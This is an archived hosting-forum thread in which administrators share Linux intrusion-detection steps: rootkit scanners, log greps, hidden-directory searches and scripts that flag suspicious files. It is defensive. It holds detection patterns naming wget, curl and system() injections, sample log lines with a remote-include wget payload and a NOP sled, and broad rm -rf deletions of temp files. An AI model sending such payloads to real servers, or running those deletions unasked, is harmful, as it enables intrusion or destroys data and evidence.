Web Hosting Talk

View Full Version : How-to detect a possible intruder ¿?


sh4ka
05-22-2007, 01:42 AM
Advice: these are steps compiled from the net and from some books; they were not written by me.

Hello..

I have a few incomplete steps to see if I have an intruder in my Linux system, but I really would like to have all your suggestions to make a good doc about this matter, so please post your tips and tricks about this subject.

1.- Download and run Rkhunter & Chkrootkit
2.- Run "w", and "netstat -nalp | grep ':SSHPORTHERE'" to see who's connected using SSH
3.- Search for accepted ssh and ftp logins.

last
cat /var/log/secure* | grep ssh | grep Accept
cat /var/log/secure* | grep ftp | grep Accept
grep ftp /var/log/messages
4.- Watch current connections and scan your ports.


netstat -nalp
nmap -p 1-65535 localhost
5.- Search for suspicious content in commonly exploited dirs.


rm -rf /tmp/sess*
rm -rf /var/dos-*
rm -rf /var/tmp/ssh-*
rm -rf /var/tmp/dos-*
ls /tmp -lab
ls /var/tmp -labR
ls /dev/shm -labR
ls /usr/local/apache/proxy -labR
ls /usr/local/samba -labR
6.- Check for anomalies in these files.

less /etc/passwd
less /etc/shadow
less /etc/group
7.- Search for new users in sudoers, check wtmp, and make sure telnet is not running.


cat /etc/sudoers
who /var/log/wtmp
cat /etc/xinetd.d/telnet
8.- Find bash history files


find '/' -iname .bash_history
9.- Check the crontab


crontab -l
10.- Update the slocate database and search for exploits.


updatedb &
For cPanel servers:

egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/*
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/*/statistics/logs/*
For Ensim servers:

egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/virtual/site*/fst/var/log/httpd/*
Search for shell code:


cat /path/of/your/web/logs/* |grep "/x90/"
11.- Search for hidden dirs


locate "..."
locate ".. "
locate " .."
locate ". "
locate " ."
12.- Search for perl-scripts running


ps aux | grep perl
13.- Check the nobody user and open files.


service httpd stop
lsof -u nobody


Please, add your tips and tricks about this.
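To make steps 3 and 10 above repeatable, here is an added example (my own, not sh4ka's) that runs the accepted-login check and the web-log greps as shell functions over a few constructed log lines embedded in the script, then cross-references the source addresses that appear in both. The sample lines, the variable names `SAMPLE_SECURE` and `SAMPLE_ACCESS`, and the function names are assumptions made for the example. The shell-code check looks for the escaped form `\x90` that Apache writes into the access log for a non-printable byte, and for the URL-encoded `%90`.

```shell
#!/bin/sh
# Added example (not from the original post): steps 3 and 10 as shell
# functions over constructed sample log lines, plus a cross-reference of the
# source addresses that show up in both.

# Constructed /var/log/secure excerpt in OpenSSH's "Accepted" format.
SAMPLE_SECURE='May 22 01:10:02 host sshd[2311]: Accepted password for root from 10.0.0.5 port 51522 ssh2
May 22 01:12:44 host sshd[2340]: Failed password for root from 203.0.113.9 port 40211 ssh2
May 22 01:13:01 host sshd[2345]: Accepted publickey for deploy from 192.0.2.17 port 50100 ssh2
May 22 02:03:17 host sshd[2501]: Accepted password for root from 203.0.113.9 port 40300 ssh2
May 22 02:41:09 host sshd[2588]: Accepted password for root from 203.0.113.9 port 40377 ssh2'

# Constructed Apache access-log excerpt (common log format).
SAMPLE_ACCESS='10.0.0.5 - - [22/May/2007:01:20:00 +0000] "GET /index.php HTTP/1.1" 200 512
203.0.113.9 - - [22/May/2007:01:21:10 +0000] "GET /index.php?page=http://example.invalid/x.txt?&cmd=wget%20http://example.invalid/b HTTP/1.1" 200 88
203.0.113.9 - - [22/May/2007:01:21:12 +0000] "GET /admin.php?x=system(\"id\") HTTP/1.1" 500 0
203.0.113.9 - - [22/May/2007:01:22:40 +0000] "GET /cgi-bin/test.cgi?\x90\x90\x90\x90\x90\x90\x90\x90AAAA HTTP/1.0" 404 0
198.51.100.4 - - [22/May/2007:01:30:00 +0000] "GET /images/logo.png HTTP/1.1" 200 4231'

# Step 3: one line "COUNT USER SOURCE" per (user, source) pair that logged in
# successfully over SSH, most frequent first.
accepted_logins() {
    printf '%s\n' "$1" \
      | grep 'sshd\[[0-9]*\]: Accepted ' \
      | awk '{ print $9, $11 }' \
      | sort | uniq -c | sort -rn \
      | awk '{ print $1, $2, $3 }'
}

# Step 10: requests carrying the injection pattern used in the post
# (chr( / system( calls, or a download/compile tool followed by an encoded space).
SUSPECT_RE='(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20'
suspicious_requests() {
    printf '%s\n' "$1" | grep -Ei "$SUSPECT_RE"
}

# Step 10, "search for shell code": a run of NOP bytes as Apache logs them
# (a non-printable byte is written as \x90) or as a client URL-encodes them (%90).
shellcode_requests() {
    printf '%s\n' "$1" | grep -E '(\\x90|%90){4,}'
}

# Source addresses that both logged in over SSH and sent a flagged request.
correlate_sources() {
    {
        accepted_logins "$1" | awk '{ print "ssh", $3 }'
        { suspicious_requests "$2"; shellcode_requests "$2"; } | awk '{ print "web", $1 }'
    } | awk '$1 == "ssh" { ssh[$2] = 1 }
             $1 == "web" { web[$2] = 1 }
             END { for (ip in ssh) if (ip in web) print ip }' | sort
}

# Stand-alone run over the embedded samples; on a real server feed it the
# logs instead, e.g. accepted_logins "$(cat /var/log/secure*)".
echo "== accepted SSH logins (count user source)"; accepted_logins "$SAMPLE_SECURE"
echo "== suspicious requests";                     suspicious_requests "$SAMPLE_ACCESS"
echo "== shell-code requests";                     shellcode_requests "$SAMPLE_ACCESS"
echo "== sources seen in both";                    correlate_sources "$SAMPLE_SECURE" "$SAMPLE_ACCESS"
```

On the sample data the correlation returns 203.0.113.9: the address that tried a remote-include and NOP-sled request also has two accepted root password logins, which is the kind of overlap worth reading `last` and wtmp for first. The functions take the log text as an argument so they can be fed rotated logs or a copy pulled off the box.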

listenmirndt
05-22-2007, 05:53 AM
Dude, rockin' thread. That was the single most useful thing I've read, and as a relative Linux noob with security issues, I have had to do a lot of Googling.

Beauty work. Really. Pretty much what every noob to Linux security & bash needs to know to have any sort of "ability" to counter hackers. The bash_history bit was the best. So damn useful.

sh4ka
05-22-2007, 06:00 AM
Glad to hear that.

Here is another tip to track exploits in temp dirs; it's a bash script:


#!/bin/bash
# List everything under the usual drop directories that is owned by a web
# user, is a directory, is executable or is a .pl script, and count the hits.
: > exploits.txt
for x in /dev/shm /tmp /usr/local/apache/proxy /var/spool /var/tmp; do
    ls -loAFR "$x" 2>/dev/null \
      | grep -E "^$|^/| apache | nobody | unknown | www | web " \
      | grep -E "^$|^/|/$|\*$|\.pl$" \
      | tee -a exploits.txt
done
echo -e "\n\nPossible Exploit Files and Directories: $(grep -Ev "^$|^/" exploits.txt | wc -l | tr -d ' ')" | tee -a exploits.txt


I also hope to have the experts of this forum posting their rules to track hackers.

rusel
05-25-2007, 04:59 AM
Also try this - ossec.net

sh4ka
05-25-2007, 04:37 PM
Cool.., I will test this.

Any other suggestions ?

Thanks

Steven
05-25-2007, 04:39 PM
rm -rf /tmp/sess*


A lot of times attackers will save their files to look similar to session files.

sh4ka
05-25-2007, 11:35 PM
Oh.. thanks, I will correct that.

Vandread
06-11-2007, 03:37 PM
Nice, I will put this to use, lol, you did a good job at explaining this.

abetterway2host
06-13-2007, 11:36 PM
This is an excellent thread. Bookmarked this one.

eymbo
07-21-2007, 11:13 PM
Thanks, this is very useful :)

baito
07-30-2007, 09:10 PM
great info! thanks

regmac01
09-16-2007, 12:56 AM
How would you compare OSSEC to Osiris?

toby27
10-19-2007, 12:28 PM
thanks man.

cat /path/of/your/web/logs/* |grep "/x90/"

What does this thing do?

Is there a script to search my whole server to see if there is a shell file?

Froweey
01-02-2008, 09:32 PM
This is outdated...
This can be easily bypassed using asm or binary lol.....

jmuleck
01-13-2008, 10:54 AM
thanks! good info!

saloniborkar
02-10-2008, 03:41 AM
Thanks for such informative thread...It will help many of us :)

Good job

wdr1
02-23-2008, 05:09 PM
Is there anything that automates doing this on a regular basis and puts it off-server (e.g., emails it out)? My fear would be that a good cracker would know to remove their tracks, hence performing these steps a day or so later, nothing would turn up.

sh4ka
02-23-2008, 06:20 PM
You can always write a shell script and send the results by mail, and believe me, a good cracker already knows about all this stuff.

Zadmin
07-24-2008, 02:22 PM
This is kind of old

plumsauce
07-24-2008, 05:15 PM
This is kind of old

But, still useful. Glad to have seen it once it got popped to the top of the reading list.

ResellerPlanet
07-25-2008, 06:28 AM
thanks man.

cat /path/of/your/web/logs/* |grep "/x90/"

What does this thing do?

Is there a script to search my whole server to see if there is a shell file?

This might be an old post but... That line searches files for shell code. Shell code doesn't have anything to do with the Linux shell. It's machine code that an attacker attempts to execute on your server by using scripts or applications called "exploits". Basically, an exploit will attempt to (ab)use a vulnerability in an application (i.e. a buffer overflow vulnerability) to inject shell code (i.e. code that listens on a port and binds a Linux command line to it), which is then executed by the CPU. For more information I recommend searching Google for the article "Smashing the Stack for Fun and Profit". It's heavy literature for newbies but it's worth reading.

About the OP: Most of the techniques explained above are really basic and will only detect possible attacks by 'newbie script kiddies'. I recommend installing an advanced IDS such as Snort or TripWire. If you're running cPanel, install ConfigServer Firewall since its LFD tool will monitor a lot of things on your server and send you notifications via email if it detects something that you might want to look into. For those who do not use cPanel: Use LSM and BFD from R-fx Networks.

Of course, the best way is to focus on intrusion prevention/avoidance and not only intrusion detection. ;)

gpl24
07-25-2008, 06:33 AM
What is LSM?

BFD = Brute force detection on APF firewall, correct?

mifbody
07-25-2008, 07:28 PM
Thank you for posting this, guys!

I found a slew of files in a ". " directory. I was able to delete the files but I don't know how to get rid of the directory itself. I tried rm -rf and placing the location in quotation marks, but it still shows up and won't go away?

I also found an IRC perl connection open on my server which goes along with the ". " directory contents I found. Man what a headache!!!

ResellerPlanet
07-26-2008, 07:28 AM
What is LSM?

BFD = Brute force detection on APF firewall, correct?

Correct. LSM = Linux Socket Monitor.

Thank you for posting this, guys!

I found a slew of files in a ". " directory. I was able to delete the files but I don't know how to get rid of the directory itself. I tried rm -rf and placing the location in quotation marks, but it still shows up and won't go away?

I also found an IRC perl connection open on my server which goes along with the ". " directory contents I found. Man what a headache!!!

Maybe it's not a space but a hidden ALT+0160 character? Just guessing.
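As an added example (mine, not from anyone in the thread), here is a way to list entries like the ". " directory above with their names escaped, so an ordinary space can be told apart from the ALT+0160 byte guessed at just above. The function names `find_odd_names` and `hexdump_name` are my own, and the script assumes GNU find, grep, xargs, ls and od.

```shell
#!/bin/sh
# Added example (not from the thread): show directory entries whose names
# contain whitespace, control characters or non-ASCII bytes, with the bytes
# made visible, so a ". " directory can be identified and removed exactly.

# One "ls -ldb" line per entry under DIR whose name has a byte outside the
# printable ASCII range '!'..'~'. In the C locale every byte is one character,
# so a 0xA0 (ALT+0160) byte is caught as well as a plain space or a newline.
# ls -b escapes the odd bytes (a space shows as "\ ", 0xA0 as "\240").
# Note: DIR itself should have a clean name, since it prefixes every result.
find_odd_names() {
    dir=$1
    find "$dir" -mindepth 1 -print0 2>/dev/null \
      | LC_ALL=C grep -az '[^!-~]' \
      | xargs -0 -r ls -ldb --
}

# Hex dump of one entry's name, e.g. "2e 20" for ". " versus "2e a0" for ".\240".
hexdump_name() {
    printf '%s' "$(basename -- "$1")" | od -An -tx1
}

# Stand-alone run over the directories sh4ka's list checks.
for d in /tmp /var/tmp /dev/shm; do
    [ -d "$d" ] && find_odd_names "$d"
done
```

Once the exact bytes are known, the safest way to remove the directory is by inode rather than by typing the name: `ls -lib /path` prints the inode number in the first column, and `find /path -maxdepth 1 -inum N -exec rm -r -- {} +` removes only that entry. The `-print0`/`-z`/`-0` chain is there so names containing newlines or other separators cannot split or hide a result.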

Xous
08-17-2008, 03:18 AM
Is there anything that automates doing this on a regular basis and puts it off-server (e.g., emails it out)? My fear would be that a good cracker would know to remove their tracks, hence performing these steps a day or so later, nothing would turn up.

This is generally why you log to a secure syslog server.

craig joe
11-04-2010, 10:29 AM
I should try this; it looks very simple but useful, thanks.

Robbie P
11-05-2010, 03:51 PM
Thanks for this, it is very simple yet extremely effective!!!

Slatko
01-13-2011, 07:09 PM
Maybe OSSEC is much better for finding out whether someone was in your system.